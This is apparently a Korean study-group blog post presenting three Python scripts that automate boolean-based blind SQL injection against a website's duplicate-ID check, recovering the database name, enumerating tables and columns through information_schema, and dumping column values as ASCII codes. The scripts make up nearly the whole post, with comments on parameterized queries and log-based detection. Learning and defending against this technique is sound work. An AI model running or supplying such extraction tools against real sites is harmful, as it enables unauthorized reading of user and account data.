Blind SQLI (아이디 중복체크) Tool

황인환·2024년 6월 4일

DB.py (DB 이름 추출, ASCII 코드로 나타냄)

import requests

# Boolean-based blind SQL injection probe against a duplicate-ID check.
# Per request only two things exist: the crafted `query` field that goes
# out, and whether `filterWord` (the marker the target prints when the
# injected condition is false) appears in the response body. Nothing is
# read from the database directly; the database name is reconstructed one
# position and one integer comparison at a time.
#
# Defender's view: the whole technique relies on the server splicing
# `query` into SQL as text, so a prepared/parameterized statement removes
# the oracle entirely. In access logs it shows up as a long burst of
# near-identical POSTs to one endpoint whose body differs only in an
# incrementing integer — a workable signature for WAF/IDS rules, as is the
# literal `ascii(substr(` / `select database()` in a form field.
url = input("url 입력: ")
print("Data정보")
ID = input("ID 입력: ")

print("hearer 정보")
print(" 큰따옴표 제거 ")
userAgent = input("User-Agent: ")
print("value값만")
cookie= input("PHPSESSID: ")
filterWord=input("filterWord: ")
DBNum=1  # 1-based character position probed inside database()

# Phase 1: length of the database name. `ascii(substr(..., pos, 1)) > 0`
# is false once pos runs past the end of the string, so the first position
# at which `filterWord` appears is one past the last character.
while True:
    blind=(f"{ID}' and (ascii(substr((select database()),{DBNum},1)) >0) and '1'='1")
    data={
        'query' : f'{blind}',

    }


    header={
        "User-Agent" : f'{userAgent}',
        "Cookie" : f'PHPSESSID={cookie}'
    }
    # Session cookie and User-Agent are replayed verbatim from user input,
    # so every probe is attributable to one PHPSESSID in server-side logs.
    response=requests.post(url,data=data,headers=header)

    if filterWord in response.text:
        print("\r")
        print("자리 수: " + str(DBNum-1))  # length = last position that still had a character
        break
            
    DBNum +=1

tn=1  # current character position (1-based)

# Phase 2: for each position, count upward from 32 with `> num` until the
# marker appears; the first num at which the comparison fails equals the
# character's ASCII code. Codes are printed, not the decoded characters.
while tn < DBNum :
    num=32
        # reset to 32 each time tn changes; without the reset inside the outer loop every position would yield the same result
    while True :
        blind=(f"{ID}' and (ascii(substr((select database()),{tn},1)) >{num}) and '1'='1")

        data={
            'query' : f'{blind}',

        }


        header={
            "User-Agent" : f'{userAgent}',
            "Cookie" : f'PHPSESSID={cookie}'
        }

        response=requests.post(url,data=data,headers=header)


            # print(response.text)



        if filterWord in response.text:
            if(num==32):
                # Marker on the very first comparison: the code is <= 32,
                # which this script treats as "no printable character" and
                # terminates the whole program, not just the loop.
                print("No")
                exit()
            else:
                    # os.system('cls' if os.name == 'nt' else 'clear') 
                print(str(num)+", ",end='')
                break

        num +=1    
    tn += 1
print("Done")

Table & Column.py (Table과 column 이름 추출, ASCII 코드로 나타냄)

import requests
import os  # only referenced from commented-out code below

# Same boolean-based blind technique as DB.py, this time against
# information_schema: `choice` selects either table names
# (`table_name from information_schema.tables`) or column names
# (`column_name from information_schema.columns`) for one schema, and the
# rows are walked with `limit {n},1`. Three phases: count rows, find each
# name's length, then recover each character as an ASCII code.
#
# Defender's view: the root cause is again a `query` value concatenated
# into SQL — parameterize the statement and the oracle disappears. The
# `information_schema.` reference inside a form field is itself a strong
# detection signal; so is the volume, since every character costs dozens
# of requests. Least-privilege DB accounts that cannot read
# information_schema for other schemas also limit what such a probe
# can enumerate.
url=input("url 입력: ")
## print("DATA 정보")
ID = input("ID 입력: ")
DB_NAME= input("DB_NAME: ")

print("hearer 정보")
print(" 큰따옴표 제거 ")
userAgent = input("User-Agent: ")
print("value값만")
cookie= input("PHPSESSID: ")
filterWord=input("filterWord: ")
print("1: table, 2: column")
choice=input("숫자를 선택하세요")
# Any input other than "1" falls through to "column".
if(choice=="1"):
    choice="table"
else:
    choice="column"


limitNum=0  # number of rows found so far (0-based `limit` offset)
# Phase 1: count rows. The first offset whose first character is not > 0
# (i.e. the row does not exist) makes the marker appear.
while(True):
    # print(limitNum)
    check=(f"{ID}' and (ascii(substr((select {choice}_name from information_schema.{choice}s where table_schema='{DB_NAME}' limit {limitNum},1),1,1)) >0) and '1'='1")
    data={
        'query' : f'{check}',
    }


    header={
        "User-Agent" : f'{userAgent}',
        "Cookie" : f'PHPSESSID={cookie}'
    }
    response=requests.post(url,data=data,headers=header)

    if filterWord in response.text:
        break
        
    
    limitNum +=1

print("갯수: " + str(limitNum))

a=0  # row index into the table/column list
while a < limitNum:
    DBNum=1  # 1-based character position inside the current name
    # Phase 2: length of row `a`'s name, same stop condition as above.
    while(True):
        # print("DB")
        check=(f"{ID}' and (ascii(substr((select {choice}_name from information_schema.{choice}s where table_schema='{DB_NAME}' limit {a},1),{DBNum},1)) >0) and '1'='1")
        data={
            'query' : f'{check}',
        }


        header={
            "User-Agent" : f'{userAgent}',
            "Cookie" : f'PHPSESSID={cookie}'
        }
        response=requests.post(url,data=data,headers=header)

        if filterWord in response.text:
            print("\r")
            print("자리 수: " + str(DBNum-1))
            break
            

        DBNum +=1
        

    tn=1

    # Phase 3: per position, count `num` upward from 32; the first num at
    # which `> num` fails is the character's ASCII code.
    while tn < DBNum :
        num=32
        # reset to 32 each time tn changes; without the reset inside the outer loop every position would yield the same result
        while True :
            blind=(f"{ID}' and (ascii(substr((select {choice}_name from information_schema.{choice}s where table_schema='{DB_NAME}' limit {a},1),{tn},1)) >{num}) and '1'='1")

            data={
                'query' : f'{blind}',
            }


            header={
                "User-Agent" : f'{userAgent}',
                "Cookie" : f'PHPSESSID={cookie}'
            }

            response=requests.post(url,data=data,headers=header)


            # print(response.text)


            if filterWord in response.text:
                if(num==32):
                    # Code <= 32 at this position: report and move on to the
                    # next position (unlike DB.py, which exits the program).
                    print("No")
                    break
                else:
                    print(str(num) + ", " , end='')
                    break
            else:
                num +=1
                continue

        tn += 1
    a +=1

print("Done")

data.py (추출한 Table 이름과 column 이름으로 데이터 추출)

import requests

# Third stage of the same boolean-based blind technique: given a table and
# column name, walk the rows with `limit {n},1` and recover each value as a
# sequence of ASCII codes. As in the other two scripts, the only feedback
# channel is whether `filterWord` appears in the response body.
#
# Defender's view: `table` and `column` here are whatever the previous
# stage enumerated, so the blast radius of one concatenated `query`
# parameter is the entire readable schema. Parameterized statements close
# the hole; rate limiting and alerting on bursts of near-identical POSTs
# with incrementing integers catch the extraction while it is running; a
# DB account restricted to the tables the feature actually needs bounds
# what can be read.
url = input("url 입력: ")
print("Data정보")
ID = input("ID 입력: ")

print("hearer 정보")
print(" 큰따옴표 제거 ")
userAgent = input("User-Agent: ")
print("value값만")
cookie= input("PHPSESSID: ")

print("추출 DATA")
table= input("table: ")
column= input("column: ")

filterWord=input("filterWord: ")

cNum=0  # number of rows found so far (0-based `limit` offset)
# Phase 1: count rows; the first offset with no first character makes the
# marker appear.
while True:
    print(cNum)
    blind=f"{ID}' and (ascii(substr((select {column} from {table} limit {cNum},1),1,1))>0) and '1'='1"
    data={
        'query' : f'{blind}',
    }

    header={
        'User-Agent' : f'{userAgent}',
        'Cookie' : f'PHPSESSID={cookie}'
    }

    response=requests.post(url, data=data, headers=header)


    if filterWord in response.text:
        break

    cNum += 1

print("갯수:" + str(cNum))

a = 0  # row index
vNum = 1  # 1-based character position probed for length
while a < cNum:
    # Phase 2: find the position at which row `a`'s value runs out.
    while True:
        blind=f"{ID}' and (ascii(substr((select {column} from {table} limit {a},1),{vNum},1))>0) and '1'='1"
        data={
            'query' : f'{blind}',

        }

        header={
            'User-Agent' : f'{userAgent}',
            'Cookie' : f'PHPSESSID={cookie}'
        }

        response=requests.post(url, data=data, headers=header)


        if filterWord in response.text:
            print("자리수:" + str(vNum))
            break

        vNum += 1
    b=1  # character position being decoded
    # Phase 3: per position, count `Num` upward from 32; the first Num at
    # which `> Num` fails is the character's ASCII code.
    while b <= vNum:
        Num=32
        while True:
            blind=f"{ID}' and (ascii(substr((select {column} from {table} limit {a},1),{b},1))>{Num}) and '1'='1"
            data={
                'query' : f'{blind}',
            }

            header={
                'User-Agent' : f'{userAgent}',
                'Cookie' : f'PHPSESSID={cookie}'
            }

            response=requests.post(url, data=data, headers=header)


            if filterWord in response.text:
                if(Num == 32):
                    # Code <= 32 at this position: nothing printable here.
                    print("Nothing")
                    break
                else:
                    print(str(Num) + ", ", end='')
                    break

            Num += 1
        b += 1
    a += 1

Login과의 차이점

  • data 정보에서 query로 파라미터 설정
  • input에서 password를 뺌

--Normaltic Study 7주차--
